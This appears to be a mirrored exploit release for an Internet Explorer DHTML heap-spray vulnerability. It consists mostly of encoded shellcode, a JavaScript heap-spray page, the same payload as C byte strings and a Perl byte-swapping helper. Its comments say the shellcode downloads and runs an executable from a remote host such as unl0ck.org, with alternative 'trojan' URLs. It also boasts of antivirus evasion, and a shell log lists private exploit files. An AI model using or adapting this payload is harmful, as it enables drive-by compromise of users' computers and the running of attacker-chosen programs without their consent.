"%uFED5%uE8E5%uE8E8%uC49E%u6D9C%u162B%u14C0%u6F48%u5C9C%u9C0F"+
"%u3764%u6C9C%u1633%u16C1%uEBC0%u16BA%u81C7%uEA90%u2646%u97DE"+
"%u18D6%uB1E4%u1D65%u4E81%uEA90%u0563%u5050%uF1F5%u18A9%u1717"+
"%u3E17%u3ED9%uFEE0%uE8FF%uE8E8%uD726%u9C71%uD610%u15F7%u649C"+
"%u160B%u16C1%uBAD1%uC716%uD19E%uC09E%u9A4A%uB792%u1717%u5717"+
"%u2F97%u6216%uD1ED%u1717%u929A%u170B%u1717%u4047%uC1E8%u137F"+
"%u1717%u7F17%u0717%u1717%u687F%u8F81%u7F17%u1717%u1717%uC7E8"+
"%u929E%u179A%u1717%u929A%u1718%u1717%u4047%uC1E8%u9A40%u429A"+
"%u1717%u4617%uC7E8%uD09E%u929A%u174A%u1717%u4047%uC1E8%uDE26"+
"%u4646%u4646%uE846%u9EC7%u9AD4%u7C92%u1717%u4717%uE840%u26C1"+
"%u46DE%u4646%u9A46%uB682%u1717%u4517%uE844%u9EC7%u9AD4%u6B92"+
"%u1717%u4717%uE840%u9AC1%u869A%u1717%u4617%u687F%u8F81%uE817"+
"%u9AA2%u1717%u4417%uC7E8%u9A48%u3E92%u1717%u4717%uE840%u7FC1"+
"%u1717%u1717%u8A9A%u1782%u1717%uE844%u9EC7%u9AD4%u2692%u1717"+
"%u4717%uE840%uE8C1%u86A2%u1717%uE817%u9AA2%u1717%u4417%uC7E8"+
"%u929A%u172E%u1717%u4047%uC1E8%uE844%u9AC7%u5692%u1717%u4717"+
"%uE840%u7FC1%u1712%u1717%u9A9A%u1782%u1717%uE846%u9AC7%u5E92"+
"%u1717%u4717%uE840%u7FC1%u1717%u1717%uC7E8%u6FFF%uE8E9%u50E8"+
"%u6372%u6547%u7478%u7356%u6573%u6472%u1764%u785B%u7376%u7E5B"+
"%u6575%u6576%u566E%u4117%u657E%u6263%u7B76%u7B56%u787B%u1774"+
"%u7B48%u6574%u7672%u1763%u7B48%u6560%u637E%u1772%u7B48%u7B74"+
"%u6478%u1772%u7E40%u5279%u726F%u1774%u6F52%u637E%u6547%u7478"+
"%u6472%u1764%u7E40%u5E79%u7279%u1763%u795E%u7263%u7965%u6372"+
"%u6758%u7972%u1756%u795E%u7263%u7965%u6372%u6758%u7972%u6542"+
"%u567B%u5E17%u6379%u6572%u7279%u4563%u7672%u5173%u7B7E%u1772"+
"%u1717%u1717%u1717%u1717%u277A%u3927%u6F72%u1772%u306D%u2130"+
//"%u7468%u7074%u2F3A%u752F%u6C6E%u6330%u2E6B%u726F%u2F67%u6F6E%u6574%u6170%u2E64%u7865%u0165" // http://unl0ck.org/notepad.exe
"%u7468%u7074%u2F3A%u742F%u6F72%u616A%u2E6E%u6F63%u2F6D%u6976%u7572%u2E73%u7865%u0165" // http://trojan.com/virus.exe
NOTE: "//" it's comments.
g00d luck!
Successfully tested on WinXP SP0 rus/eng, WinXP SP1 rus/eng, WinXP SP2 rus/eng, Win9x.
Successfully percent to execute code is: 90%
Undetecting tested on: AntiVirus Kaspersy, Norton AV, Dr. Web.
p.s. darkeagle
http://unl0ck.org
#!/usr/bin/perl
open(FILE,"<file_to_open.txt");
@passwd = <FILE>;
close(FILE);
foreach $line(@passwd)
{
($r0,$r1,$r2,$r3,$r4,$r5,$r6,$r7,$r8,$r9,$r10,$r11,$r12,$r13,$r14,$r15) = split("%",$line);
print "%$r1%$r0%$r3%$r2%$r5%$r4%$r7%$r6%$r9%$r8%$r11%$r10%$r13%$r12%$r15%$r14\n";
}
<!--
0day IE DHTML Universal exploit
rewritten by darkeagle
http://unl0ck.org
greetz: unl0ckerz { nekd0, choix, xtix, 0xdeadbabe, crash-x, antiq };
rosieloz { rave };
nosystemz { CoKi };
#m00, #unl0ck, SkyLined, drg4njubas
xploit downloads http://unl0ck.org/notepad.exe and executes it...
!-->
<HTML>
<SCRIPT id="mafaka" language="javascript">
sMSHTML_heap_spray = unescape("%u0C0C%u0C0C");
for (i=0; i<7; i++)
// 512 bytes
sMSHTML_heap_spray += sMSHTML_heap_spray;
try {exploit(opener.document.createComment(sMSHTML_heap_spray));
}
catch(e) {
window.open(document.location.href);
}
function exploit(parent_element) {
opener.focus();
window.moveTo(100000, 100000);
iHeap_fill_to_address = 0x12000000;
sHeap_return_address = unescape("%u0C0C%u0C0C");
sShellcode = unescape("%u3737%u3737" +
"%u0FEB"+"%u8058"+"%u1730"+"%u8140"+"%u6D38"+"%u3030"+"%u7521"+"%uEBF4"+"%uE805"+"%uFFEC"+
"%uFFFF%u94FE%u1716%u4A17%u2642%u73CC%u149C%u8457%u549C%u57E8"+
"%uEE62%u449C%u7114%uC526%uAF71%u0717%u9671%u5A2D%u634D%u3E10"+
"%uFED5%uE8E5%uE8E8%uC49E%u6D9C%u162B%u14C0%u6F48%u5C9C%u9C0F"+
"%u3764%u6C9C%u1633%u16C1%uEBC0%u16BA%u81C7%uEA90%u2646%u97DE"+
"%u18D6%uB1E4%u1D65%u4E81%uEA90%u0563%u5050%uF1F5%u18A9%u1717"+
"%u3E17%u3ED9%uFEE0%uE8FF%uE8E8%uD726%u9C71%uD610%u15F7%u649C"+
"%u160B%u16C1%uBAD1%uC716%uD19E%uC09E%u9A4A%uB792%u1717%u5717"+
"%u2F97%u6216%uD1ED%u1717%u929A%u170B%u1717%u4047%uC1E8%u137F"+
"%u1717%u7F17%u0717%u1717%u687F%u8F81%u7F17%u1717%u1717%uC7E8"+
"%u929E%u179A%u1717%u929A%u1718%u1717%u4047%uC1E8%u9A40%u429A"+
"%u1717%u4617%uC7E8%uD09E%u929A%u174A%u1717%u4047%uC1E8%uDE26"+
"%u4646%u4646%uE846%u9EC7%u9AD4%u7C92%u1717%u4717%uE840%u26C1"+
"%u46DE%u4646%u9A46%uB682%u1717%u4517%uE844%u9EC7%u9AD4%u6B92"+
"%u1717%u4717%uE840%u9AC1%u869A%u1717%u4617%u687F%u8F81%uE817"+
"%u9AA2%u1717%u4417%uC7E8%u9A48%u3E92%u1717%u4717%uE840%u7FC1"+
"%u1717%u1717%u8A9A%u1782%u1717%uE844%u9EC7%u9AD4%u2692%u1717"+
"%u4717%uE840%uE8C1%u86A2%u1717%uE817%u9AA2%u1717%u4417%uC7E8"+
"%u929A%u172E%u1717%u4047%uC1E8%uE844%u9AC7%u5692%u1717%u4717"+
"%uE840%u7FC1%u1712%u1717%u9A9A%u1782%u1717%uE846%u9AC7%u5E92"+
"%u1717%u4717%uE840%u7FC1%u1717%u1717%uC7E8%u6FFF%uE8E9%u50E8"+
"%u6372%u6547%u7478%u7356%u6573%u6472%u1764%u785B%u7376%u7E5B"+
"%u6575%u6576%u566E%u4117%u657E%u6263%u7B76%u7B56%u787B%u1774"+
"%u7B48%u6574%u7672%u1763%u7B48%u6560%u637E%u1772%u7B48%u7B74"+
"%u6478%u1772%u7E40%u5279%u726F%u1774%u6F52%u637E%u6547%u7478"+
"%u6472%u1764%u7E40%u5E79%u7279%u1763%u795E%u7263%u7965%u6372"+
"%u6758%u7972%u1756%u795E%u7263%u7965%u6372%u6758%u7972%u6542"+
"%u567B%u5E17%u6379%u6572%u7279%u4563%u7672%u5173%u7B7E%u1772"+
"%u1717%u1717%u1717%u1717%u277A%u3927%u6F72%u1772%u306D%u2130"+
//"%u7468%u7074%u2F3A%u362F%u2E34%u3332%u2E39%u2E37%u3831%u2F34%u6577%u2E62%u7865%u0165"
"%u7468%u7074%u2F3A%u752F%u6C6E%u6330%u2E6B%u726F%u2F67%u6F6E%u6574%u6170%u2E64%u7865%u0165"
//"%u7468%u7074%u2F3A%u742F%u6F72%u616A%u2E6E%u6F63%u2F6D%u6976%u7572%u2E73%u7865%u0165"
);
iHeap_header_size = 0x255;
iHeap_block_size = 0x400000;
iShellcode_size = sShellcode.length * 2;
iNopslide_size = iHeap_block_size - (iHeap_header_size + iShellcode_size);
sNopslide = sHeap_return_address;
while (sNopslide.length*2<iNopslide_size) sNopslide+=sNopslide;
sNopslide = sNopslide.substring(0, iNopslide_size/2);
iHeap_block_count = (iHeap_fill_to_address-0x400000) / iHeap_block_size;
memory = new Array();
for (i=0;i<iHeap_block_count;i++) memory[i] = sNopslide + sShellcode;
sMSHTML_heap_spray = sNopslide.substring(0, 0x100);
for(i=0;i<1024;i++) try {
parent_element.appendChild(document.createComment(sMSHTML_heap_spray));
} catch (e) { }
}
</SCRIPT>
</HTML>
C/C++ shellcode:
\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4
\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26
\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14
\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E
\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48
\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB
\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65
\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17
\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10
\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1
\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED
\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13
\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17
\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17
\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8
\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE
\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17
\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17
\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40
\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8
\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17
\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17
\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1
\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7
\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92
\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A
\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40
\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50
\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B
\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65
\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72
\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B
\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E
\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72
\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56
\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65
\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73
\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27
\x27\x39\x72\x6F\x72\x17\x6D\x30\x30\x21
//---------- http://site.com/trojanX.exe
\x68\x74\x74\x70\x3A\x2F\x2f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x74\x72\x6f\x6f\x61\x6e\x2e\x65\x78\x65
//----------
\x01
$ tar -xzvf priv8.tar.gz
priv8/
priv8/out
priv8/7350
priv8/hl.c
priv8/m00-proftpd-down.c
priv8/7350squish.c
$ cd priv8
$ ls
7350 7350squish.c hl.c m00-proftpd-down.c out
$ echo lol...
lol...
$ exit
20 min later:
links www.unl0ck.org
-----------------------------------------------------------------
Not Found
The requested URL / was not found on this server.
-----------------------------------------------------------------
-flsh/dk
Reference in a new issue View git blame Copy permalink